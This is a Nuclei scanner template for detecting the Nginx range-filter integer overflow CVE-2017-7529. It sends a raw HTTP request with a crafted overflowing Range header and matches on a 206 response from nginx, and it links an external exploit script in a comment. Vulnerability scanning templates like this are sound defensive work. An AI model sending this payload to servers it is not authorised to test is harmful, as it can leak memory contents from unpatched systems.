nuclei-templates/cves/CVE-2017-7529.yaml

31 lines
861 B
YAML

id: CVE-2017-7529
info:
author: "Harsh Bothra"
name: "Nginx Remote Integer Overflow"
severity: medium
# This template supports the detection part only.
# Do not test any website without permission
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=-17208,-9223372036854758792
Accept-Encoding: gzip, deflate
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 206
- type: word
words:
- nginx
part: header